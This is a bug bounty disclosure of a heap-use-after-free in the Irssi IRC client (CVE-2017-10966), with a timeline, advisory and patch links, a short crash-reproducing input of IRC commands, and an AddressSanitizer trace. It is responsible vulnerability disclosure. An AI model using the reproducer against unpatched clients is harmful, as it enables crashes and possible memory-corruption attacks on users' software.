Internet Bug Bounty: CVE-2017-10966: Heap-use-after-free in Irssi <1.0.4

35 days after reading https://irssi.org/2017/05/12/fuzzing-irssi/, I was able to trigger a heap-use-after-free in irssi 1.0.2.

Timeline:
Report to vendor: 16 June 2017
Acknowledge by vendor: 16 June 2017
Fixed by vendor: 7 July 2017

Advisory:
http://seclists.org/oss-sec/2017/q3/80

Patch:
https://github.com/irssi/irssi/commit/5e26325317c72a04c1610ad952974e206

./irssi < test001
CAP LS
NICK root
USER root root /dev/stdin :root
MODE  +i
WHOIS root
WHO +00000000000000000000o00

==30112==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000008100 at pc 0x0000006d3a48 bp 0x7ffdd447b320 sp 0x7ffdd447b318
READ of size 8 at 0x607000008100 thread T0
    #0 0x6d3a47 in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:455:30
    #1 0x7f97420273bf in g_hash_table_foreach (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x393bf)
    #2 0x6d3786 in sig_channel_destroyed /root/irssi-1.0.2/src/core/nicklist.c:465:2
    #3 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #4 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3
    #5 0x699ec1 in channel_destroy /root/irssi-1.0.2/src/core/channels.c:83:2
    #6 0x672ce0 in event_join /root/irssi-1.0.2/src/irc/core/channel-events.c:258:3
    #7 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #8 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3
    #9 0x62cd3d in irc_server_event /root/irssi-1.0.2/src/irc/core/irc.c:308:7
    #10 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #11 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3
    #12 0x62d33a in irc_parse_incoming_line /root/irssi-1.0.2/src/irc/core/irc.c:362:3
    #13 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #14 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3
    #15 0x62d6ba in irc_parse_incoming /root/irssi-1.0.2/src/irc/core/irc.c:383:3
    #16 0x6bb9b2 in irssi_io_invoke /root/irssi-1.0.2/src/core/misc.c:55:3
    #17 0x7f9742038229 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a229)
    #18 0x7f97420385df  (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a5df)
    #19 0x7f974203868b in g_main_context_iteration (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a68b)
    #20 0x57e4a7 in main /root/irssi-1.0.2/src/fe-text/irssi.c:326:3
    #21 0x7f97408273f0 in __libc_start_main /build/glibc-cxyGtm/glibc-2.24/csu/../csu/libc-start.c:291
    #22 0x42e979 in _start (/root/irssi-1.0.2/src/fe-text/irssi+0x42e979)

0x607000008100 is located 64 bytes inside of 72-byte region [0x6070000080c0,0x607000008108)
freed by thread T0 here:
    #0 0x4e4170 in __interceptor_cfree.localalias.1 (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4170)
    #1 0x6d39eb in nicklist_destroy /root/irssi-1.0.2/src/core/nicklist.c:112:2
    #2 0x6d39eb in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:456

previously allocated by thread T0 here:
    #0 0x4e4520 in calloc (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4520)
    #1 0x7f974203d9e0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f9e0)

SUMMARY: AddressSanitizer: heap-use-after-free /root/irssi-1.0.2/src/core/nicklist.c:455:30 in nicklist_remove_hash